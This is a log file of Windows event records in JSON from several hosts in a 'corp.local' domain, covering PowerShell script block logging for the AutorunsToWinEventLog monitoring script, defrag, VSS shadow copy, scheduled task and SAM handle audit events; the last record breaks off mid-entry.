{"EventTime":"2021-10-02T16:54:39.638863+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"VERBOSE","SeverityValue":1,"Severity":"DEBUG","EventID":4104,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":2,"OpcodeValue":15,"RecordNumber":711200,"ActivityID":"{C4CABCCB-A926-0000-DBB9-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":6804,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Creating Scriptblock text (1 of 1):\r\n{\n\n $principalName = $_.Name.Split(\"\\\")[1] + \"@\" + $DomainFQDN\n\n $Member = New-Object PSObject\n $Member | Add-Member Noteproperty 'GroupName' $GroupName\n $Member | Add-Member Noteproperty 'PrincipalType' $_.ObjectClass\n $Member | Add-Member Noteproperty 'PrincipalName' $principalname\n\n $Data = @\"\n\nGroupName: $($Member.GroupName)\nPrincipalType: $($Member.PrincipalType)\nPrincipalName: $($Member.PrincipalName)\n\"@\n\n Write-EventLog -LogName Autoruns -Source AutorunsToWinEventLog -EntryType Information -EventId 2 -Message $Data\n\n }\r\n\r\nScriptBlock ID: a0cb3c3a-5b5e-47dd-96ee-aa0a898ae82c\r\nPath: C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1","Category":"Execute a Remote Command","Opcode":"On create calls","MessageNumber":"1","MessageTotal":"1","ScriptBlockText":"{\n\n $principalName = $_.Name.Split(\"\\\")[1] + \"@\" + $DomainFQDN\n\n $Member = New-Object PSObject\n $Member | Add-Member Noteproperty 'GroupName' $GroupName\n $Member | Add-Member Noteproperty 'PrincipalType' $_.ObjectClass\n $Member | Add-Member Noteproperty 'PrincipalName' $principalname\n\n $Data = @\"\n\nGroupName: $($Member.GroupName)\nPrincipalType: $($Member.PrincipalType)\nPrincipalName: $($Member.PrincipalName)\n\"@\n\n Write-EventLog -LogName Autoruns -Source AutorunsToWinEventLog -EntryType Information -EventId 2 -Message $Data\n\n 
}","ScriptBlockId":"a0cb3c3a-5b5e-47dd-96ee-aa0a898ae82c","Path":"C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1","EventReceivedTime":"2021-10-02T16:54:40.745689+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:54:39.573009+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4103,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":106,"OpcodeValue":20,"RecordNumber":711197,"ActivityID":"{C4CABCCB-A926-0001-D3B7-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":6804,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"CommandInvocation(Get-LocalGroup): \"Get-LocalGroup\"\r\nCommandInvocation(Where-Object): \"Where-Object\"\r\nParameterBinding(Where-Object): name=\"FilterScript\"; value=\"$_.SID -Match \"S-1-5-32-555\" -Or $_.SID -Match \"S-1-5-32-544\" -Or $_.SID -Match\n \"S-1-5-32-562\"\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Netmon Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Access Control Assistance Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Backup Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Certificate Service DCOM Access\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Cryptographic Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Device Owners\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Distributed COM Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Event Log Readers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Guests\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Hyper-V Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"IIS_IUSRS\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Network Configuration 
Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Performance Log Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Performance Monitor Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Power Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Print Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Endpoint Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Management Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Remote Access Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Remote Desktop Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Remote Management Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Replicator\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Storage Replica Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"System Managed Accounts Group\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Users\"\r\n\r\n\r\nContext:\r\n Severity = Informational\r\n Host Name = ConsoleHost\r\n Host Version = 5.1.17763.1971\r\n Host ID = 6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n Host Application = powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n Engine Version = 5.1.17763.1971\r\n Runspace ID = 7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n Pipeline ID = 1\r\n Command Name = Get-LocalGroup\r\n Command Type = Cmdlet\r\n Script Name = C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n Command Path = \r\n Sequence Number = 5118\r\n User = CORP\\SYSTEM\r\n Connected User = \r\n Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n","Category":"Executing Pipeline","Opcode":"To be used when operation is just executing a method","ContextInfo":" Severity = Informational\r\n Host 
Name = ConsoleHost\r\n Host Version = 5.1.17763.1971\r\n Host ID = 6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n Host Application = powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n Engine Version = 5.1.17763.1971\r\n Runspace ID = 7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n Pipeline ID = 1\r\n Command Name = Get-LocalGroup\r\n Command Type = Cmdlet\r\n Script Name = C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n Command Path = \r\n Sequence Number = 5118\r\n User = CORP\\SYSTEM\r\n Connected User = \r\n Shell ID = Microsoft.PowerShell\r\n","Payload":"CommandInvocation(Get-LocalGroup): \"Get-LocalGroup\"\r\nCommandInvocation(Where-Object): \"Where-Object\"\r\nParameterBinding(Where-Object): name=\"FilterScript\"; value=\"$_.SID -Match \"S-1-5-32-555\" -Or $_.SID -Match \"S-1-5-32-544\" -Or $_.SID -Match\n \"S-1-5-32-562\"\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Netmon Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Access Control Assistance Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Backup Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Certificate Service DCOM Access\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Cryptographic Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Device Owners\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Distributed COM Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Event Log Readers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Guests\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Hyper-V Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"IIS_IUSRS\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; 
value=\"Network Configuration Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Performance Log Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Performance Monitor Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Power Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Print Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Endpoint Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Management Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Remote Access Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Remote Desktop Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Remote Management Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Replicator\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Storage Replica Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"System Managed Accounts Group\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Users\"\r\n","EventReceivedTime":"2021-10-02T16:54:40.745689+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:54:39.636283+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":800,"SourceName":"PowerShell","TaskValue":8,"RecordNumber":404964,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Pipeline execution details for command line: $Member = New-Object PSObject\n. \r\n\r\nContext Information: \r\n\tDetailSequence=1\r\n\tDetailTotal=1\r\n\r\n\tSequenceNumber=5119\r\n\r\n\tUserId=CORP\\SYSTEM\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=1\r\n\tScriptName=C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tCommandLine= $Member = New-Object PSObject\n \r\n\r\nDetails: \r\nCommandInvocation(New-Object): \"New-Object\"\r\nParameterBinding(New-Object): name=\"TypeName\"; value=\"PSObject\"\r\n","Category":"Pipeline Execution Details","Opcode":"Info","EventData":"<Data> $Member = New-Object PSObject\n</Data><Data>\tDetailSequence=1\r\n\tDetailTotal=1\r\n\r\n\tSequenceNumber=5119\r\n\r\n\tUserId=CORP\\SYSTEM\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=1\r\n\tScriptName=C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tCommandLine= $Member = New-Object PSObject\n</Data><Data>CommandInvocation(New-Object): \"New-Object\"\r\nParameterBinding(New-Object): name=\"TypeName\"; 
value=\"PSObject\"\r\n</Data>","EventReceivedTime":"2021-10-02T16:54:39.698777+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:45:02.452496+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":53504,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":111,"OpcodeValue":10,"RecordNumber":708640,"ActivityID":"{C4CABCCB-A926-0000-84AD-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":1060,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows PowerShell has started an IPC listening thread on process: 6928 in AppDomain: DefaultAppDomain.","Category":"PowerShell Named Pipe IPC","Opcode":"Open (async)","param1":"6928","param2":"DefaultAppDomain","EventReceivedTime":"2021-10-02T16:45:03.678420+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:54:39.917570+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":403,"SourceName":"PowerShell","TaskValue":4,"RecordNumber":404984,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Engine state is changed from Available to Stopped. \r\n\r\nDetails: \r\n\tNewEngineState=Stopped\r\n\tPreviousEngineState=Available\r\n\r\n\tSequenceNumber=5159\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Engine Lifecycle","Opcode":"Info","EventData":"<Data>Stopped</Data><Data>Available</Data><Data>\tNewEngineState=Stopped\r\n\tPreviousEngineState=Available\r\n\r\n\tSequenceNumber=5159\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=</Data>","EventReceivedTime":"2021-10-02T16:54:40.776938+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:44:31.978275+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":258,"SourceName":"Microsoft-Windows-Defrag","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":70122,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The storage optimizer successfully completed defragmentation on (C:)","Opcode":"Info","Data":"defragmentation","Data_1":"(C:)","EventData.Binary":"0000000034020000FA0100000000000022B651A2296BEDD85E9C8D030000000000000000","EventReceivedTime":"2021-10-02T18:44:32.045196+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:44:31.978275+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":264,"SourceName":"Microsoft-Windows-Defrag","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":70121,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The storage optimizer couldn't complete retrim on (C:) because: The operation requested is not supported by the hardware backing the volume. (0x8900002A)","Data":"retrim","Data_1":"(C:)","Data_2":"The operation requested is not supported by the hardware backing the volume. (0x8900002A)","EventData.Binary":"2A000089800200008D0000009000000022B63823DBB1BD381B0700000000000000000000","EventReceivedTime":"2021-10-02T18:44:32.045196+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T12:00:01.542865+05:45","Hostname":"IT03.corp.local","Keywords":"9268408033128480768","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":8222,"SourceName":"VSSAudit","TaskValue":3,"RecordNumber":40728690,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Security","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Shadow copy has been created.\r\n \r\n User SID:\t\t\tS-1-5-18\r\n User name:\t\t\tNT AUTHORITY\\SYSTEM\r\n Process ID:\t\t\t0x00000000000005ec\r\n Process image name:\t\tC:\\Windows\\System32\\vssadmin.exe\r\n \r\n Shadow Set ID:\t\t\t{2511584f-5a90-4d45-8ff1-ff021c177669}\r\n Shadow ID:\t\t\t{bb8a0598-7c9b-4ce0-9ffc-382a8e42483b}\r\n Provider ID:\t\t\t{b5946137-7b9f-4925-af80-51abd60b20d5}\r\n Original Machine:\t\tIT03.corp.local\r\n Original Volume:\t\t\t\\\\?\\Volume{8945544a-0000-0000-0000-f09d07000000}\\\r\n Shadow device name:\t\t\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy14\r\n","Opcode":"Info","EventData":"<Data>S-1-5-18</Data><Data>NT AUTHORITY\\SYSTEM</Data><Data>0x00000000000005ec</Data><Data>C:\\Windows\\System32\\vssadmin.exe</Data><Data>{2511584f-5a90-4d45-8ff1-ff021c177669}</Data><Data>{bb8a0598-7c9b-4ce0-9ffc-382a8e42483b}</Data><Data>{b5946137-7b9f-4925-af80-51abd60b20d5}</Data><Data>IT03.corp.local</Data><Data>\\\\?\\Volume{8945544a-0000-0000-0000-f09d07000000}\\</Data><Data>\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy14</Data>","EventReceivedTime":"2021-10-01T12:00:03.496423+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T12:00:01.549804+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4904,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13568,"OpcodeValue":0,"RecordNumber":40728689,"ActivityID":"{C4CABCCB-A926-0000-82BE-CAC426A9D701}","ExecutionProcessID":632,"ExecutionThreadID":5188,"Channel":"Security","Message":"An attempt was made to register a security event source.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nProcess:\r\n\tProcess ID:\t0x1870\r\n\tProcess Name:\tC:\\Windows\\System32\\VSSVC.exe\r\n\r\nEvent Source:\r\n\tSource Name:\tVSSAudit\r\n\tEvent Source ID:\t0x69EE42E","Category":"Audit Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","AuditSourceName":"VSSAudit","EventSourceId":"0x69ee42e","ProcessId":"0x1870","ProcessName":"C:\\Windows\\System32\\VSSVC.exe","EventReceivedTime":"2021-10-01T12:00:03.496423+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T12:00:01.552466+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4905,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13568,"OpcodeValue":0,"RecordNumber":40728691,"ActivityID":"{C4CABCCB-A926-0000-82BE-CAC426A9D701}","ExecutionProcessID":632,"ExecutionThreadID":5188,"Channel":"Security","Message":"An attempt was made to unregister a security event source.\r\n\r\nSubject\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nProcess:\r\n\tProcess ID:\t0x1870\r\n\tProcess Name:\tC:\\Windows\\System32\\VSSVC.exe\r\n\r\nEvent Source:\r\n\tSource Name:\tVSSAudit\r\n\tEvent Source ID:\t0x69EE42E","Category":"Audit Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","AuditSourceName":"VSSAudit","EventSourceId":"0x69ee42e","ProcessId":"0x1870","ProcessName":"C:\\Windows\\System32\\VSSVC.exe","EventReceivedTime":"2021-10-01T12:00:03.496423+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T00:48:15.608875+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":8224,"SourceName":"VSS","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":70050,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The VSS service is shutting down due to idle timeout. ","Opcode":"Info","EventData.Binary":"2D20436F64653A2020434F525356434330303030303735392D2043616C6C3A2020434F525356434330303030303734312D205049443A202030303030393634342D205449443A202030303030383430382D20434D443A2020433A5C57696E646F77735C73797374656D33325C76737376632E6578652020202D20557365723A204E616D653A204E5420415554484F524954595C53595354454D2C205349443A532D312D352D313820","EventReceivedTime":"2021-10-02T00:48:16.266564+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T12:35:18.147872+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4701,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":4064670,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":4708,"Channel":"Security","Message":"A scheduled task was disabled.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E4\r\n\r\nTask Information:\r\n\tTask Name: \t\t\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n\tTask Content: \t\t<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.6\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo>\r\n <Version>1.0</Version>\r\n <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>\r\n <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\r\n <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\r\n <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\r\n <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\r\n </RegistrationInfo>\r\n <Principals>\r\n <Principal id=\"NetworkService\">\r\n <UserId>S-1-5-20</UserId>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <AllowHardTerminate>false</AllowHardTerminate>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <Enabled>false</Enabled>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Hidden>true</Hidden>\r\n <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n 
<RestartOnFailure>\r\n <Count>3</Count>\r\n <Interval>PT1M</Interval>\r\n </RestartOnFailure>\r\n <StartWhenAvailable>true</StartWhenAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>true</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n </Settings>\r\n <Triggers>\r\n <CalendarTrigger>\r\n <StartBoundary>2021-10-01T12:34:48+05:45</StartBoundary>\r\n <ScheduleByDay>\r\n <DaysInterval>1</DaysInterval>\r\n </ScheduleByDay>\r\n </CalendarTrigger>\r\n </Triggers>\r\n <Actions Context=\"NetworkService\">\r\n <ComHandler>\r\n <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>\r\n <Data><![CDATA[timer]]></Data>\r\n </ComHandler>\r\n </Actions>\r\n</Task>\r\n\r\nOther Information:\r\n\tProcessCreationTime: \t\t5066549580795729\r\n\tClientProcessId: \t\t\t5784\r\n\tParentProcessId: \t\t\t604\r\n\tFQDN: \t\t0\r\n\t","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e4","TaskName":"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask","TaskContent":"<?xml version=\"1.0\" encoding=\"UTF-16\"?>\n<Task version=\"1.6\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n <RegistrationInfo>\n <Version>1.0</Version>\n <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>\n <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\n <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\n <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\n <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\n </RegistrationInfo>\n <Principals>\n <Principal id=\"NetworkService\">\n <UserId>S-1-5-20</UserId>\n </Principal>\n </Principals>\n <Settings>\n 
<AllowHardTerminate>false</AllowHardTerminate>\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n <Enabled>false</Enabled>\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\n <Hidden>true</Hidden>\n <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n <RestartOnFailure>\n <Count>3</Count>\n <Interval>PT1M</Interval>\n </RestartOnFailure>\n <StartWhenAvailable>true</StartWhenAvailable>\n <IdleSettings>\n <StopOnIdleEnd>true</StopOnIdleEnd>\n <RestartOnIdle>false</RestartOnIdle>\n </IdleSettings>\n <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\n </Settings>\n <Triggers>\n <CalendarTrigger>\n <StartBoundary>2021-10-01T12:34:48+05:45</StartBoundary>\n <ScheduleByDay>\n <DaysInterval>1</DaysInterval>\n </ScheduleByDay>\n </CalendarTrigger>\n </Triggers>\n <Actions Context=\"NetworkService\">\n <ComHandler>\n <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>\n <Data><![CDATA[timer]]></Data>\n </ComHandler>\n </Actions>\n</Task>","ClientProcessStartKey":"5066549580795729","ClientProcessId":"5784","ParentProcessId":"604","RpcCallClientLocality":"0","FQDN":"IT01.corp.local","EventReceivedTime":"2021-10-01T12:35:19.317363+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T05:28:30.134199+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4661,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12803,"OpcodeValue":0,"RecordNumber":190890673,"ExecutionProcessID":512,"ExecutionThreadID":520,"Channel":"Security","Message":"A handle to an object was requested.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\tSecurity Account Manager\r\n\tObject Type:\tSAM_USER\r\n\tObject Name:\tS-1-5-21-2569713578-3403938347-3732993993-501\r\n\tHandle ID:\t0x6742c1380\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x200\r\n\tProcess Name:\tC:\\Windows\\System32\\lsass.exe\r\n\r\nAccess Request Information:\r\n\tTransaction 